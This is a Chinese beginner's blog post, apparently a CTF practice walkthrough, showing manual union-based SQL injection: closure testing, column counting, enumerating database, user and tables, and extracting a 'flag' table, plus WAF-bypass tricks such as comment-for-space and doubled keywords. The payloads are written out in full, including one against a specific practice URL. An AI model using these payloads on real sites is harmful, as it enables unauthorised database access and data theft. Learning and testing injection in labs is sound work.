小白的sql注入

最新推荐文章于 2022-07-27 14:09:36 发布
最新推荐文章于 2022-07-27 14:09:36 发布
阅读量114 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41645130/article/details/101474492
版权

判断有无单引号报护

10651191-2d5e103e6fa43032.png

如果有单引号报护,
1' #

注释掉其后的单引号

and 1=1

1' and 1=1 #

10651191-ca5bb17a1546d74e.png
依然回显数据

1 and 1=2

10651191-111f574244fba2db.png

解决了我的一个疑惑, 就是如果 是 ’1 and 1=2' 还会不会执行语句, 现在看来是会的

1' order by 10 #


10651191-c6dcbbe0fb086c8a.png

然后就判断数据表只有 4列

1' union select database(), user() #

10651191-4e4b366082277a43.png

提示列数不一样


10651191-e43ec7bfbe876216.png

1' union select database(),2,3 , 4#

10651191-824d2e9e185d0296.png
image.png
10651191-760039a94404a2e6.png

1' union select database(),2,3 , user()#

10651191-cc1b7da7bfb9c6f4.png

所以database是 luozhen
用户名是 luozhen@127.0.0.1

1' union select table_name,table_schema 3,4 from information_schema.tables where table_schema= 'luozhen'#

获得了版本信息


10651191-e93782acefe97183.png

@@version_compile_os
用这个得到了操作系统的信息

10651191-efcdc60cbdd80171.png

1' union select table_name,table_schema 3,4 from information_schema.tables where table_schema= 'luozhen'#

这个出问题了,并没有成功


10651191-0ba67ef3de10de1b.png

1' union select table_name,table_schema ,3,4 from information_schema.tables where table_schema= 'luozhen'#

原来是少了个逗号

10651191-ada07e7ef4e83c55.png
ok这次成功了

说明有一个flag的表

哇哈好兴奋, 成功了

payload 如下:

1' union select 1,flag, 2,3 from flag#


10651191-08a84819b45442c2.png

绕过waf的几种方式

绕过空格

用() 或者 /**/

10651191-e2e79661df441048.png
绕过空格

绕过 =

用<>

提取字符

ascii()默认提取第一个字符
mid()from 1 for 3
substr()
surstring()

拼接字符

concat()

注入分类

基于布尔的盲注

这是异或注入


10651191-993f0559365603f3.png

http://120.24.86.145:9004/1ndex.php?id=-1' ununionion seselectlect 1,group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()--+

再补充一点和mysql相关的。。


10651191-83e8f6dad2bbd615.png
萍水间人
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
小白SQL注入基础入门详细解析
m0_55479420的博客
03-31 262
1.SQL分类 基于变量数据类型分 数字型注入 字符型注入 '' ' ) ') 搜索型注入 %’ JSON型注入(判断是数字还是字符 考虑要不要闭合 JSON={"XINGMING":"DUMP' and 1=2 union select 1,database(),2 #"} 很多人学习python,不知道从何学起。 很多人学习python,掌握了基本语法过后,不知道在哪里寻找案例上手。 很多已经做案例的人,却不知道如何去学习更加高深的知识。 那么针对这三类人,我给大家提供一个好的学习平台,免费
小白初学sql注入
Butterfly_Erhai_Lake的博客
10-26 479
sql-lab lesson1&2&3
小白SQL注入(一)
x519461623的博客
11-28 290
数据库操作与注入逻辑(不玩数据库很难吃透sql注入) 要学sql注入,就得先了解数据库。 所谓知己知彼,百战不殆 如果你对数据库一窍不通,然后用Sql注入的一般测试方法去测… 对吧,加个’ 然后对面报错了你就高兴的大喊,“啊,这个有注入漏洞”然后就不知道怎么弄了 那么接下来就开始吧!(大佬勿喷) 我们先来看看数据库是个什么东西: (mysql的安装搭建这里就不讲了,百度很多) 也可以用集成坏境...
一些入门的的SQL注入小白基础笔记
unimoon1995的博客
08-30 332
SQL注入user()返回当前数据库连接使用的用户; database()返回当前数据库连接使用的数据库; version()返回当前数据库的版本; information_schema为mysql中自带的数据库,提供访问数据库元数据的方式。 元数据:关于数据的数据,如数据库名或表名,列的数据类型,或访问权限等。 information_schema中,有数个只读表。实际上为视图,不是基本表。...
sql注入及其工具sqlmap的使用(小白
weixin_45761012的博客
04-14 231
关于sql注入的问题(小白) 第一是关于工具:sqlmap; 对于一个网站是否存在sql注入漏洞,我们可以通过在参数后面加’ 看是否闭合,从而判断是否存在sql注入。 然后我们就发现报错到这里我们就使用sqlmap来进行扫描。 语法为python sqlmap,py -u ""然后我们就发现acuart存在get方式的注入,数据库为MySQL。然后我们查看用户 在url后面加上–users然后再对...
sql注入的常用命令
09-18
sql注入的常用命令,个人总结,适合一些小白使用,大神可以了解了解,有错请指出。
mysql,sql注入简单测试了解
最新发布
08-31
sql注入语句
超级SQL注入工具
12-22
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。
sql注入攻击之sqlmap
06-10
手工进行sql注入对于初学者有一定的难度,本节课程针对于信息安全小白讲解怎么使用sqlmap来进行sql注入,结合前面章节将的内容可以的判断互联网上网站是否存在sql注入
防止SQL注入的5种方法
06-13
防止SQL注入的5种方法,小白分享,不喜勿喷,谢谢,,,
SQL注入小白入门,大佬请绕道
LISTONE的个人博客
04-15 411
SQL注入小白入门,大佬请绕道 什么是SQL 结构化查询语言(Structured Query Language)简称SQL SQL使我们有能力访问数据库 什么是SQL注入 用户提交的数据可以当作命令被数据库解析执行 漏洞示例代码: <?php echo '<h1>欢迎关注LISTONE公众号</h1>'; $name = $_GET['nam...
sql注入 小白入门学习笔记(一)
mastergu2的博客
06-08 437
首先介绍几个英文单词: schema:数据库 table:表 column:列 / 字段 常用的函数: select就不说了,不会的建议去菜鸟教程看 insert into 表名 name(字段名1,字段名2…) values(值1,值2…) update 表名 set 字段名 = 更新后的值 where 选择条件 delete from 表名 where 选择条件 limit 偏移量,操作个数 比如说 limit 0,1 就是从0开始,查一个 几个查询数据库基本信息的函数: database() : 查看
sql注入 小白入门学习笔记(六)
mastergu2的博客
07-10 298
学习了利用函数updatexml报错的方法进行注入。 在这里首先介绍updatexml函数的用法。 UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 第三个参数:new_value,String格式,替换查找到的符合条件的数据 然后给出我们报错所使用的语句:
小白SQL注入基础入门(持续修改)
MSB_WLAQ的博客
10-12 386
1.SQL分类 基于变量数据类型分 数字型注入 字符型注入 '' ' ) ') 搜索型注入 %’ JSON型注入(判断是数字还是字符 考虑要不要闭合 JSON={"XINGMING":"DUMP' and 1=2 union select 1,database(),2 #"} 基于获取数据的方法 基于回显 基于错误 盲注 布尔型盲注 时间盲注 基于注入点位置分类(请求方法) 注入要判断是否有干扰 GET注入 Cookie注入 POST注入(登录框)REQUEST 注入 (全部接受) H
SQL注入基础 sql注入详细解释 小白学习笔记
qq_43355651的博客
09-07 1003
sql注入作为安全攻防中最重要的一个部分,可以说是所有渗透测试注入中最为重要的一个注入,不管是预防还是测试,都需要扎实的基础才能明白sql注入。 温馨提示:此文章仅限于学习记录与讨论,不得随意测试或者注入,互联网不是法外之地,任何除学习之外的事情与作者无关。 sql注入顾名思义就是执行sql命令 原理:执行的用户能使用sql注入绕过认证机制输入变量,使得sql语句发生变化,通过接收和传递重新定义sql语句,然后可以重新操作。 原理一定要弄清楚,以后才可以活学活用。 产生sql注入的条件:1..
注入攻击
凉茶铺的博客
07-27 5380
注入攻击是Web安全领域中一种最为常见的攻击方式。XSS本质上也是一种针对HTML的注入攻击。注入攻击的本质,是把用户输入的数据当做代码执行。这里有两个关键条件,第一个是用户能够控制输入;第二个是原本程序要执行的代码,拼接了用户输入的数据。解决注入攻击的核心思想“数据与代码分离”原则。...
MySQL⼿注之联合查询注⼊详解
KHOST的博客
04-23 469
MySQL联合查询注入原理 union select联合查询,即合并(取交集,结果中没有重复⾏)前后两个查询;前提是前后查询视图必须拥有相同数量的列,列也必需拥有相同的数据类型。 Union联合查询注入基本流程 1、判断是否存在注入 方法一:单引号法 注入点' 方法二:逻辑法 and 1=1and 1=21' and '1'='11' and '1'=...
Sql注入基础原理介绍(超详细)
weixin_30325487的博客
09-06 4297
一、Sql注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。 二、Web 程序三层架构 三层架构(3-tier architecture) 通常意义上就是将整个业务应用划分为: 界面层(User Interface layer) 业务逻辑层(Business Logic...
CTF中SQL注入常见题型整理
热门推荐
test
10-10 11万+
前言 正文 无过滤带回显的情况 可能使用到的工具:firefox、hackbar for firfox、sqlmap for linux 手工注入 bugku的环境 在这一环境中的主要是通过post方式传入一个参数id来查询数据库内容。 首先判断sql语句闭合方式 当在id的值后面加上'时,界面无回显,可以判断后端的sql语句应该是 select xxxx from xxxx where...
我是一个小白,我想测试我的应用是否存在sql注入的漏洞该怎么做
07-12
作为开发者,确保你的应用不受SQL注入攻击是非常重要的。下面是一些测试应用是否存在SQL注入漏洞的常见方法: 1. 输入测试:尝试在应用程序的输入字段中输入特殊字符,如单引号(')或分号(;)。如果应用程序没有...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值